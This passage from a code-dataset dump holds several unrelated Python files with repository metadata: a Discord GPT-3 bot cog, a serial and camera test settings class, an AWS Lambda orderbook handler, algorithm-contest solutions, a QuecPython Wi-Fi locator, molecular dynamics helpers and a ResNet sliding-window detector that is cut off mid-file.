backward(length)\n\ncolor(\"green\") # 커서의 색상을 녹색으로 만든다\nleft(90) # 왼쪽으로 90도 회전시켜 위를 향하게 한다\nbackward(150) # 아래쪽으로 내리기\ntree(120) # 나무를 그리는 함수 호출\n\ninput('type to exit') # 그리기 종료 후 입력 대기\n","repo_name":"gstatsr94/python_study","sub_path":"Chapter01/draw_tree.py","file_name":"draw_tree.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9231180465","text":"from .camera_settings import CameraSettings\nfrom .parameter import Parameter\nfrom .serial_port_settings import SerialPortSettings\n\n\nclass TestSettings:\n\n _cam: list[CameraSettings] = []\n _sp: list[SerialPortSettings] = []\n _cam_display = None\n _cam_leds = None\n _sp_main = None\n _sp_usb = None\n\n @staticmethod\n def get_cam_display():\n return TestSettings._cam_display\n\n @staticmethod\n def set_cam_display(name: str):\n cam_index = TestSettings.get_index_cam(name)\n if cam_index == -1:\n return -1\n else:\n TestSettings._cam_display = TestSettings._cam[cam_index]\n\n @staticmethod\n def get_cam_leds():\n return TestSettings._cam_leds\n\n @staticmethod\n def set_cam_leds(name: str):\n cam_index = TestSettings.get_index_cam(name)\n if cam_index == -1:\n # TODO: Error Code\n return -1\n else:\n TestSettings._cam_leds = TestSettings._cam[cam_index]\n\n @staticmethod\n def get_sp_main():\n return TestSettings._sp_main\n \n @staticmethod\n def set_sp_main(name: str):\n sp_index = TestSettings.get_index_sp(name)\n if sp_index == -1:\n # TODO: Error code\n return -1\n TestSettings._sp_main = TestSettings._sp[sp_index]\n\n @staticmethod\n def add_new_sp_settings(name: str, port: str, baudrate: int):\n TestSettings._sp.append(SerialPortSettings(name, port, baudrate))\n\n @staticmethod\n def get_index_sp(name: str):\n for i in range(len(TestSettings._sp)):\n sp_name = TestSettings._sp[i].get_name()\n if(sp_name == name):\n return i\n return -1\n \n @staticmethod\n def get_sp(name: str):\n index = TestSettings.get_index_sp(name)\n if index == -1:\n return None\n else:\n return TestSettings._sp[index]\n \n @staticmethod\n def delete_sp_settings(name: str):\n sp_index = TestSettings.get_index_sp(name)\n if sp_index != -1:\n TestSettings._sp.pop(sp_index)\n\n @staticmethod\n def add_new_cam_settings(settings: CameraSettings):\n TestSettings._cam.append(settings)\n\n @staticmethod\n def get_index_cam(name: str):\n for i in range(len(TestSettings._cam)):\n cam_name = TestSettings._cam[i].get_name()\n if(cam_name == name):\n return i\n return -1\n \n @staticmethod\n def get_cam(name: str):\n index = TestSettings.get_index_cam(name)\n if index == -1:\n return None\n else:\n return TestSettings._cam[index]\n\n @staticmethod\n def delete_cam_settings(name: str):\n cam_index = TestSettings.get_index_cam(name)\n if cam_index != -1:\n TestSettings._cam.pop(cam_index)\n ","repo_name":"whrovic/HMI_Test_System","sub_path":"src/main/python/com/hmi_test_system/data/hardware_settings/test_settings.py","file_name":"test_settings.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40161214870","text":"import asyncio\n\nimport discord\nfrom discord.ext import commands\n\nfrom Errors.CreditExhaustedError import CreditExhaustedError\nfrom Errors.EmptyPromptError import EmptyPromptError\nfrom Errors.NotAdminError import NotAdminError\nfrom Helpers import user_parse\nfrom Helpers.Emojis import thumbs_up, complete\nfrom Helpers.Messages import help_message\nfrom Helpers.Wrappers import check_setup\nfrom Implementation.ApiClient import ApiClient\nfrom Implementation.DbHandler import DbHandler\nfrom Implementation.LoggingHandler import LoggingHandler\nfrom Prompts import language_map\n\n\nclass MainCog(commands.Cog):\n def __init__(self,\n discord_bot: commands.Bot,\n db_handler: DbHandler,\n api_client: ApiClient,\n logger: LoggingHandler\n ):\n self.__logger = logger.get_logger(\"main_cog\")\n self.__bot = discord_bot\n self.__db = db_handler\n self.__api = api_client\n\n @commands.Cog.listener()\n async def on_command_error(self, ctx, error):\n \"\"\"\n From: https://gist.github.com/EvieePy/7822af90858ef65012ea500bcecf1612\n \"\"\"\n\n if hasattr(ctx.command, 'on_error'):\n return\n cog = ctx.cog\n if cog:\n if cog._get_overridden_method(cog.cog_command_error) is not None:\n return\n ignored = (commands.CommandNotFound,)\n error = getattr(error, 'original', error)\n if isinstance(error, ignored):\n return\n if isinstance(error, commands.DisabledCommand):\n await ctx.send(f'{ctx.command} has been disabled.')\n elif isinstance(error, commands.NoPrivateMessage):\n try:\n await ctx.author.send(f'{ctx.command} can not be used in Private Messages.')\n except discord.HTTPException:\n pass\n elif isinstance(error, commands.PrivateMessageOnly):\n try:\n await ctx.author.send(f'{ctx.command} can only be used in Private Messages.')\n except discord.HTTPException:\n pass\n\n @commands.Cog.listener()\n async def on_guild_join(self, guild):\n owner_id = guild.owner_id\n guild_id = guild.id\n guild_name = guild.name\n if not self.__db.find_server(guild_id):\n self.__db.add_server({\n \"server_id\": guild_id,\n \"server_name\": guild_name,\n \"owner_id\": owner_id,\n \"api_token\": None,\n \"response_length\": 100,\n \"daily_allowance\": 100,\n \"vips\": [owner_id],\n \"users\": []\n })\n else:\n self.__db.update_server_name_id(guild_id, guild_name, owner_id)\n\n @commands.Cog.listener()\n async def on_guild_remove(self, guild):\n guild_id = guild.id\n self.__db.delete_server(guild_id)\n\n async def cog_before_invoke(self, ctx):\n await ctx.message.add_reaction(thumbs_up)\n\n async def cog_after_invoke(self, ctx):\n await ctx.message.remove_reaction(thumbs_up, self.__bot.user)\n await ctx.message.add_reaction(complete)\n\n async def check_server_token(self, ctx):\n guild_id = ctx.guild.id\n return self.__db.check_server_token(guild_id)\n\n @staticmethod\n async def prompt_setup(ctx):\n await ctx.send(\"Owner of this server hasn't configured the bot yet. If you're the owner, send this bot a DM \"\n \"with command !setup.\")\n\n @staticmethod\n async def empty_warning(ctx):\n await ctx.send(\"Hey, no empty prompts!\")\n\n @staticmethod\n async def openai_down_warning(ctx):\n await ctx.send(\"OpenAI seems to be down. This sometimes happen and is usually resolved within minutes.\")\n\n @staticmethod\n async def credit_warning(ctx):\n user_id, user_name = user_parse(ctx)\n await ctx.send(\"{}, your daily allowance is over. :cry:\".format(user_name))\n\n @staticmethod\n async def not_admin_warning(ctx):\n user_id, user_name = user_parse(ctx)\n await ctx.send(\"{}, this command is only usable by admins.\".format(user_name))\n\n @commands.command()\n async def help(self, ctx):\n await ctx.send(help_message)\n\n @commands.command()\n @commands.dm_only()\n async def setup(self, ctx):\n user_id, user_name = user_parse(ctx)\n owned_servers = self.__db.find_owned_servers(user_id)\n if not len(owned_servers) > 0:\n await ctx.send(\"You don't seem to own any servers that i'm on. If you think this is a mistake, kick the \"\n \"bot and add it again.\")\n return\n\n def check_token(m):\n return m.channel == ctx.channel\n\n owned_server = owned_servers[0]\n\n if len(owned_servers) > 1:\n message = \"\"\n for serv in owned_servers:\n message += \"[\" + str((owned_servers.index(serv) + 1)) + \"]\"\n message += \"server name:\" + serv[\"server_name\"]\n message += \", server id:\" + serv[\"server_id\"]\n message += \"\\n\"\n\n await ctx.send(\"I noticed that you're an admin on multiple servers. Please choose which server \"\n \"you'd like to setup.\"\n \"{}\".format(message)\n )\n try:\n msg = await self.__bot.wait_for(\"message\", check=check_token, timeout=60)\n choice = int(msg.content)\n owned_server = owned_servers[choice]\n except asyncio.TimeoutError:\n await ctx.send(\"Timeout has been reached. You can try again with !setup.\")\n return\n except (TypeError, ValueError):\n await ctx.send(\"Invalid value. Please select a number. (e.g. '1') You can try again with !setup.\")\n return\n\n await ctx.send(\"Important note: For this bot to function and process requests, it has to save your api key in \"\n \"a database. This means that if the bad guys somehow access it, they can use your token and \"\n \"even cause incurring charges. We cannot be held responsible for that and suggest you to host \"\n \"on your own. You can do so by visiting the public repo on github(\"\n \"github.com/e4c6/DiscordGPT-3). If that's not a concern for \"\n \"you, feel free to proceed. If you ever doubt something is going fishy, you should quickly \"\n \"regenerate your api token through the developer portal on beta.openai.com.\")\n\n server_id, server_name = owned_server[\"server_id\"], owned_server[\"server_name\"]\n await ctx.send(\"Hi {}, i see that you're the owner of {}. Now please send me your OpenAI api key within 60 \"\n \"seconds. (and \"\n \"nothing else).\\nIt should be visible to you on https://beta.openai.com/account/api-keys.\".format(\n user_name, server_name))\n\n try:\n msg = await self.__bot.wait_for(\"message\", check=check_token, timeout=60)\n except asyncio.TimeoutError:\n await ctx.send(\"Timeout has been reached. You can try again with !setup.\")\n return\n\n if not msg.content[0:3] == \"sk-\":\n await ctx.send(\"Your api token should start with the characters sk-. You can restart this process when \"\n \"you find it.\")\n return\n\n if len(msg.content) > 50:\n await ctx.send(\"Your key seems abnormally long... You can restart this process when \"\n \"you find the right key.\")\n return\n\n self.__db.set_server_token(server_id, msg.content)\n await ctx.send(\"Successfully set the token, enjoy! If you like this bot, please consider donating via \"\n \" BTC address: 14ozvJYfChmiXwqhfzH4yCqcYR7gzwfVYT\")\n\n @commands.command()\n @commands.guild_only()\n async def config(self, ctx):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n owner_id, vips, _, length, allowance = self.__db.get_server_settings(guild_id)\n if user_id != owner_id:\n raise NotAdminError\n length_str = \"# Length: {}\\n\".format(length)\n allowance_str = \"# Allowance: {}\\n\".format(allowance)\n vips_str = \"\"\"# Vips\\n\"\"\"\n for i in range(len(vips)):\n vips_str += \"{} - {}\\n\".format(i + 1, vips[i])\n vips_str += \"Note: Owners are automatically assigned a vip role.\"\n return await ctx.send(length_str + allowance_str + vips_str)\n\n @commands.command()\n @commands.guild_only()\n async def allowance(self, ctx, allowance: int):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n owner_id, vips, _, length, old_allowance = self.__db.get_server_settings(guild_id)\n if user_id != owner_id:\n raise NotAdminError\n self.__db.update_server_allowance(guild_id, allowance)\n return await ctx.send(\"Successfully updated member allowance to {}\".format(allowance))\n\n @commands.command()\n @commands.guild_only()\n async def length(self, ctx, length: int):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n owner_id, vips, _, old_length, allowance = self.__db.get_server_settings(guild_id)\n if user_id != owner_id:\n raise NotAdminError\n self.__db.update_server_length(guild_id, length)\n return await ctx.send(\"Successfully updated response length to {}\".format(length))\n\n @commands.command()\n @commands.guild_only()\n async def vip(self, ctx, *, member: discord.Member):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n owner_id, vips, _, length, allowance = self.__db.get_server_settings(guild_id)\n if user_id != owner_id:\n raise NotAdminError\n member_id, member_name = member.id, member.display_name\n self.__db.add_vip(guild_id, member_id)\n return await ctx.send(\"Successfully added {} to vips.\".format(member_name))\n\n @commands.command()\n @commands.guild_only()\n async def remove_vip(self, ctx, *, member: discord.Member):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n owner_id, vips, _, length, allowance = self.__db.get_server_settings(guild_id)\n if user_id != owner_id:\n raise NotAdminError\n member_id, member_name = member.id, member.display_name\n self.__db.remove_vip(guild_id, member_id)\n return await ctx.send(\"Successfully removed {} from vips.\".format(member_name))\n\n @commands.command()\n @commands.guild_only()\n async def credit(self, ctx):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n today_usage, _, _ = self.__db.get_user_settings(guild_id, user_id)\n _, _, _, _, allowance = self.__db.get_server_settings(guild_id)\n return await ctx.send(\"{}, your remaining daily allowance is: {}.\".format(user_name, allowance - today_usage))\n\n @commands.command()\n @commands.guild_only()\n async def settings(self, ctx):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n _, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n return await ctx.send(\n \"{}, your language is set to: {} and temperature is set to: {}\".format(user_name, language, temperature))\n\n @commands.command()\n @commands.guild_only()\n async def language(self, ctx, lang: str):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n possible_languages = list(language_map.keys())\n if lang not in possible_languages:\n return await ctx.send(\"{}, chosen language must be within: {}\".format(user_name, possible_languages))\n today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n self.__db.update_user_language(guild_id, user_id, lang)\n return await ctx.send(\n \"Sucessfully updated your settings, {}. Old language: {}, New language: {}\".format(user_name, language,\n lang))\n\n @commands.command()\n @commands.guild_only()\n async def temperature(self, ctx, temp: float):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n if not 0 <= temp <= 1:\n return await ctx.send(\"{}, chosen temperature must equal or be within the range of 0 and 1. (e.g. 0.3) \"\n \"You can read more about temperature on \"\n \"https://towardsdatascience.com/how-to-sample-from-language-models-682bceb97277 or \"\n \"https://beta.openai.com/docs/api-reference/create-completion-via-get.\".format(\n user_name))\n today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n self.__db.update_user_temperature(guild_id, user_id, temp)\n return await ctx.send(\n \"Sucessfully updated your settings, {}. Old temperature: {}, New temperature: {}\".format(user_name,\n temperature,\n temp))\n\n @commands.command()\n @commands.guild_only()\n @check_setup\n async def answer(self, ctx, *prompt: str):\n usage = len(list(\"\".join(prompt)))\n if usage == 0:\n raise EmptyPromptError\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n owner_id, vips, token, length, allowance = self.__db.get_server_settings(guild_id)\n if usage + today_usage > allowance and user_id not in vips:\n raise CreditExhaustedError\n answer = await self.__api.answer(prompt, length=length, api_key=token, language=language,\n temperature=temperature)\n self.__db.increment_member_usage(guild_id, user_id, usage)\n return await ctx.send(discord.utils.escape_mentions(answer))\n\n @commands.command()\n @commands.guild_only()\n @check_setup\n async def complete(self, ctx, *prompt: str):\n usage = len(list(\"\".join(prompt)))\n if usage == 0:\n raise EmptyPromptError\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n owner_id, vips, token, length, allowance = self.__db.get_server_settings(guild_id)\n if usage + today_usage > allowance and user_id not in vips:\n raise CreditExhaustedError\n answer = await self.__api.complete(prompt, length=length, api_key=token, language=language,\n temperature=temperature)\n self.__db.increment_member_usage(guild_id, user_id, usage)\n return await ctx.send(discord.utils.escape_mentions(answer))\n\n @commands.command()\n @commands.guild_only()\n @check_setup\n async def song(self, ctx, *prompt: str):\n usage = len(list(\"\".join(prompt)))\n if usage == 0:\n raise EmptyPromptError\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n owner_id, vips, token, length, allowance = self.__db.get_server_settings(guild_id)\n if usage + today_usage > allowance and user_id not in vips:\n raise CreditExhaustedError\n answer = await self.__api.song(song_name=prompt, user_name=user_name, length=length, api_key=token,\n language=language,\n temperature=temperature)\n self.__db.increment_member_usage(guild_id, user_id, usage)\n return await ctx.send(discord.utils.escape_mentions(answer))\n\n @commands.command()\n @commands.guild_only()\n @check_setup\n async def foulmouth(self, ctx, *prompt: str):\n usage = len(list(\"\".join(prompt)))\n if usage == 0:\n raise EmptyPromptError\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n owner_id, vips, token, length, allowance = self.__db.get_server_settings(guild_id)\n if usage + today_usage > allowance and user_id not in vips:\n raise CreditExhaustedError\n answer = await self.__api.foulmouth_answer(prompt, length=length, api_key=token, language=language,\n temperature=temperature)\n self.__db.increment_member_usage(guild_id, user_id, usage)\n return await ctx.send(discord.utils.escape_mentions(answer))\n\n @commands.command()\n @commands.guild_only()\n @check_setup\n async def sentiment(self, ctx, *prompt: str):\n usage = len(list(\"\".join(prompt)))\n if usage == 0:\n raise EmptyPromptError\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n owner_id, vips, token, length, allowance = self.__db.get_server_settings(guild_id)\n if usage + today_usage > allowance and user_id not in vips:\n raise CreditExhaustedError\n answer = await self.__api.sentiment(prompt, api_key=token, language=language)\n self.__db.increment_member_usage(guild_id, user_id, usage)\n return await ctx.send(discord.utils.escape_mentions(answer))\n\n @commands.command()\n @commands.guild_only()\n @check_setup\n async def emojify(self, ctx, *prompt: str):\n usage = len(list(\"\".join(prompt)))\n if usage == 0:\n raise EmptyPromptError\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n owner_id, vips, token, length, allowance = self.__db.get_server_settings(guild_id)\n if usage + today_usage > allowance and user_id not in vips:\n raise CreditExhaustedError\n answer = await self.__api.emojify(prompt, length=length, api_key=token, language=language,\n temperature=temperature)\n self.__db.increment_member_usage(guild_id, user_id, usage)\n return await ctx.send(discord.utils.escape_mentions(answer))\n\n @commands.command()\n @commands.guild_only()\n @check_setup\n async def sarcasm(self, ctx, *prompt: str):\n usage = len(list(\"\".join(prompt)))\n if usage == 0:\n raise EmptyPromptError\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n owner_id, vips, token, length, allowance = self.__db.get_server_settings(guild_id)\n if usage + today_usage > allowance and user_id not in vips:\n raise CreditExhaustedError\n answer = await self.__api.sarcastic_answer(prompt, length=length, api_key=token, language=language,\n temperature=temperature)\n self.__db.increment_member_usage(guild_id, user_id, usage)\n return await ctx.send(discord.utils.escape_mentions(answer))\n\n @commands.command()\n @commands.guild_only()\n @check_setup\n async def headline(self, ctx, *prompt: str):\n usage = len(list(\"\".join(prompt)))\n if usage == 0:\n raise EmptyPromptError\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n owner_id, vips, token, length, allowance = self.__db.get_server_settings(guild_id)\n if usage + today_usage > allowance and user_id not in vips:\n raise CreditExhaustedError\n answer = await self.__api.headline(prompt, length=length, api_key=token, language=language,\n temperature=temperature)\n self.__db.increment_member_usage(guild_id, user_id, usage)\n return await ctx.send(discord.utils.escape_mentions(answer))\n","repo_name":"e4c6/DiscordGPT-3","sub_path":"Cogs/Maincog.py","file_name":"Maincog.py","file_ext":"py","file_size_in_byte":20616,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"67"} +{"seq_id":"19549670914","text":"import json\nimport boto3\nimport os\nimport sys\nimport logging\nimport logging.config\nimport decimal\nimport kuloko_handler.handler.api_handler as api\n\ndef lambda_handler(event, context):\n try:\n\n session = boto3.session.Session()\n table = boto3.resource('dynamodb', endpoint_url = \"http://dynamodb:8000\").Table('Quote')\n\n sym = 'BTC'\n depth=5\n \n orderbook = api.Orderbook(sym)\n orderbook.depth =depth\n json_orderbook = orderbook.fetch(return_type='json')\n json_orderbook['sym'] = sym\n\n item = json.loads(str(json_orderbook), parse_float=decimal.Decimal)\n table.put_item(\n Item=item\n )\n \n return {\n 'statusCode': 200,\n 'body': json.dumps({\n 'message': 'DONE!'\n }),\n }\n\n except Exception as e:\n logger.exception(e)\n return {\n 'statusCode': 500,\n 'body': json.dumps({\n 'error_message': str(e)\n }),\n }\n\n","repo_name":"tanico-rikudo/kuloko","sub_path":"aws/feed_handler/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28006907173","text":"'''\n단지번호붙이기\nhttps://www.acmicpc.net/problem/2667\n그래프 이론, 그래프 탐색, 깊이 우선 탐색, 넓이 우선 탐색\n'''\n\n\nimport sys\n\ninput = sys.stdin.readline\n\ndic = {0:[1, 0], 1:[-1, 0], 2:[0, 1], 3:[0, -1]}\n\ndef dfs(x, y):\n result = 1\n for i in range(4):\n nx = x + dic[i][0]\n ny = y + dic[i][1]\n if 0 <= nx < N and 0 <= ny < N:\n if graph[nx][ny] == 1:\n graph[nx][ny] = -1\n result += dfs(nx, ny)\n return result\n\nN = int(input())\ngraph = [[0] * N for _ in range(N)]\n\nfor i in range(N):\n row = input()\n for j in range(N):\n graph[i][j] = int(row[j])\n\nanswer = []\nfor i in range(N):\n for j in range(N):\n if graph[i][j] == 1:\n graph[i][j] = -1\n answer.append(dfs(i, j))\n\nanswer.sort()\nprint(len(answer))\nprint('\\n'.join(map(str, answer)))\n","repo_name":"JooJaeHwan/Baekjoon","sub_path":"Silver/2667.py","file_name":"2667.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30067732172","text":"# Copyright (c) Quectel Wireless Solution, Co., Ltd.All Rights Reserved.\r\n# \r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n# \r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n# \r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\nimport usocket as socket\r\nimport log\r\nimport net\r\nimport dataCall\r\nimport __wifiLocator\r\n\r\nclass wifilocator:\r\n\r\n def __init__(self, token=None):\r\n self.wifitoken = token\r\n\r\n def getwifilocator(self):\r\n net_sta = net.getState()\r\n if net_sta != -1 and ((net_sta[1][0] == 1) or (net_sta[1][0] == 5)):\r\n call_state = dataCall.getInfo(1, 0)\r\n if (call_state != -1) and (call_state[2][0] == 1):\r\n if len(self.wifitoken) != 16:\r\n return -2\r\n try:\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sockaddr = socket.getaddrinfo('www.queclocator.com', 80)[0][-1]\r\n sock.connect(sockaddr)\r\n cellinfo = __wifiLocator.getWifilocreq(self.wifitoken)\r\n senddata = b\"POST /location/QLOC HTTP/1.0\\r\\nHost: www.queclocator.com\\r\\nContent-Length: {}\\r\\nContent-Type: 05\\r\\nAccept-Charset: utf-8\\r\\n\\r\\n{}\".format(cellinfo[0], cellinfo[1])\r\n sock.write(senddata)\r\n l = sock.readline()\r\n try:\r\n l = l.split(None, 2)\r\n status = int(l[1])\r\n except:\r\n raise ValueError(\"Connect FAIL!\")\r\n reason = \"\"\r\n if status == 200:\r\n while True:\r\n l = sock.readline()\r\n j = l.decode().split(\":\")\r\n if not l or l == b\"\\r\\n\":\r\n break\r\n data = sock.recv(1024)\r\n return __wifiLocator.encodeWifilocreq(data)\r\n else:\r\n if len(l) > 2:\r\n reason = l[2].rstrip()\r\n raise ValueError(\"error info:===='{}'====\".format(reason))\r\n except Exception as e:\r\n print(\"Wifi locator Get the coordinate error:%s \"%str(e))\r\n return -3\r\n else:\r\n return -1\r\n else:\r\n return -1\r\n\r\n\r\n","repo_name":"QuecPython/microPython","sub_path":"ports/quectel/core/wifilocator.py","file_name":"wifilocator.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71741377814","text":"T = int(input())\n\nfor test_case in range(1, T + 1):\n n, m = map(int, input().split())\n board = [[0 for _ in range(n + 1)]]\n for _ in range(n):\n board.append([0] + list(map(int, input().split())))\n res = 0\n for i in range(1, n + 1):\n for j in range(1, n + 1):\n board[i][j] = board[i-1][j] + board[i][j]\n\n for i in range(1, n - m + 2):\n for j in range(1, n - m + 2):\n res = max(res, sum(board[i + m - 1][j: j + m]) - sum(board[i - 1][j: j + m]))\n\n print(f'#{test_case} {res}')","repo_name":"devyuseon/problem-solving","sub_path":"SWEA/2001.py","file_name":"2001.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33114033506","text":"import numpy as np\n\n# The simulation will require most of the functions you have already\n# implemented above. If it helps you debug, feel free to copy and\n# paste the code here.\ndef my_distance(drij):\n \"\"\"\n Compute length of displacement vector drij\n assume drij already accounts for PBC\n\n Args:\n drij (np.array) : vector(s) of length 3\n Returns:\n float: length (distance) of vector(s)\n \"\"\"\n return np.linalg.norm(drij, axis=0)\n\n\ndef my_disp_in_box(drij, lbox):\n \"\"\"\n Impose minimum image condition on displacement vector drij=ri-rj\n\n Args:\n drij (np.array): length-3 displacement vector ri-rj\n lbox (float): length of cubic cell\n Returns:\n np.array: drij under MIC\n \"\"\"\n\n return drij - lbox * np.round(drij / lbox)\n\n\ndef my_pos_in_box(pos, lbox):\n \"\"\" wrap positions inside simulation box\n\n Args:\n pos (np.array): positions, shape (natom, ndim)\n lbox (float): box side length\n Returns:\n np.array: pos in box\n \"\"\"\n\n return -lbox / 2 + (pos - lbox / 2) % lbox\n\n\ndef my_kinetic_energy(vel, mass):\n \"\"\" Calculate total kinetic energy.\n\n Args:\n vel (np.array): particle velocities, shape (natom, ndim)\n mass (float): particle mass\n Return:\n float: total kinetic energy\n \"\"\"\n k = 0.0\n for i in vel:\n k += sum(0.5 * mass * i ** 2)\n\n return k\n\n\ndef my_potential_energy(rij, rc):\n \"\"\" Calculate total potential energy.\n\n Args:\n rij (np.array): distance table, shape (natom, natom)\n Return:\n float: total potential energy\n \"\"\"\n vshift = 4 * rc ** (-6) * (rc ** (-6) - 1)\n potential = 0.0\n for i in range(len(rij)):\n for j in range(i + 1, len(rij[0])):\n r = rij[i][j]\n if r <= rc:\n potential += 4 * r ** (-6) * (r ** (-6) - 1) - vshift\n\n return potential\n\n\ndef my_force_on(parameters):\n \"\"\"\n Compute force on atom i\n\n Args:\n i (int): particle index\n pos (np.array) : particle positions, shape (natom, ndim)\n lbox (float): side length of cubic box\n Returns:\n np.array: force on atom i, a length-3 vector\n \"\"\"\n i, pos, lbox, rc = parameters\n Force = np.zeros(3)\n cur = pos[i]\n for atom in pos:\n if (atom == cur).all():\n continue\n r_ij = my_disp_in_box(cur - atom, lbox)\n r = my_distance(r_ij)\n if r <= rc:\n Force += 24 * r ** (-8) * (2 * r ** (-6) - 1) * r_ij\n return Force\n\n\ndef get_distance_table(N, rij):\n drij = np.zeros((N, N))\n for i in range(N):\n for j in range(i + 1, N):\n disp = rij[(i,j)]\n distance = my_distance(disp)\n drij[i][j] = distance\n drij[j][i] = distance\n return drij\n\ndef get_displacement_table(N, R, lbox):\n rij = np.zeros((N, N, 3))\n for i in range(N):\n for j in range(i + 1, N):\n disp = my_disp_in_box(R[i] - R[j], lbox)\n rij[i][j] = disp\n rij[j][i] = disp\n return rij\n\ndef my_temperature(k,N):\n \"\"\" Calculate system temperature.\n\n Args:\n Ek (float): kinetic energy\n atoms (integer): number of atoms\n Return:\n float: temperature\n \"\"\"\n return k/(3*N/2)\n\ndef my_pressure(V,N,T,R,F):\n viral = np.sum([np.dot(R[i],F[i]) for i in range(N)])\n return (N*T + viral/3) / V\n\n","repo_name":"navining/metadynamics","sub_path":"properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"3302487715","text":"from keras.applications.resnet50 import preprocess_input \nfrom keras.applications import ResNet50\nfrom keras.preprocessing.image import img_to_array\nfrom keras.applications import imagenet_utils\nimport numpy as np\nimport cv2\n\n#daha once yazdigimiz kodlari import ediyoruz\nfrom sliding_window_2 import sliding_window\nfrom image_pyramid import image_pyramid\nfrom non_max_supression_3 import non_max_suppression\n\nWIDTH = 600\nHEIGHT = 600\nPYR_SCALE = 1.5 # image pyramid scale\nWIN_STEP = 16 # sliding step size\nROI_SIZE = (200,150)\nINPUT_SIZE = (224, 224) ## resnete sokacagimiz resmin input boyutu\n# sabit parametreler hicbir zaman degismeyecek parametreler olacakları icin buyuk yazdık\n\nprint(\"Loading ResNet\")\nmodel = ResNet50(weights = \"imagenet\", include_top = True)\n\n\n#nesne takibi yapacagimiz resim\noriginal = cv2.imread(\"husky.jpg\")\noriginal = cv2.resize(original, dsize=(WIDTH, HEIGHT))\n# once bizim fonksiyonlarımıza 600,600 seklinde sokuyoruz en son resnet'e\n# 224,224 seklinde sokacagiz\ncv2.imshow(\"Husky\", original)\n\n(H, W) = original.shape[:2]\n\n# image pyramid\npyramid = image_pyramid(original, PYR_SCALE, ROI_SIZE) # In each iteration, we will run a sliding window.\n\nrois = []\nlocs = []\n\nfor image in pyramid:\n\n #image_pyramid te bir PYR_SCALE uyguluyoruz bunu scaleye de uygulamalıyız cunku bir dengesizlik olusur\n scale = W/float(image.shape[1])\n \n #WIN_STEP piksel kayma\n for (x, y, roiOrig) in sliding_window(image, WIN_STEP, ROI_SIZE):\n x = int(x*scale)\n y = int(y*scale)\n w = int(ROI_SIZE[0]*scale)\n h = int(ROI_SIZE[1]*scale)\n\n #roiOrig alıp sınıflandırmada kullanmam gerekiyor onun için resize ediyoruz\n roi = cv2.resize(roiOrig, INPUT_SIZE)\n roi = img_to_array(roi)\n # preprocess_input kullanarak resnete hazir hale getirmis oluyorum\n roi = preprocess_input(roi)\n\n #rois icerisine roi ekliyorum\n rois.append(roi)\n locs.append((x,y,x+w,y+h))\n\nrois = np.array(rois, dtype=\"float32\")\n\nprint(\"classification\")\n\npreds = model.predict(rois)\n\npreds = imagenet_utils.decode_predictions(preds, top=1)\n\nlabels = {}\n#bu degerden yuksek tahminleri isleme alicam\nmin_conf = 0.9 # 0.95, 0.8\n\nfor (i, p) in enumerate(preds):\n\n # tahminler 3 tane değer dondurulecek 1. imageNet_id, 2. label(sınıf)\n # 3. yüzde tahmin değeri.\n (_, label, prob) = p[0]\n\n #eger prob, min_conf tan buyukse\n if prob >= min_conf:\n #ozzetle min_conf degerinden yuksek tahminleri isleme 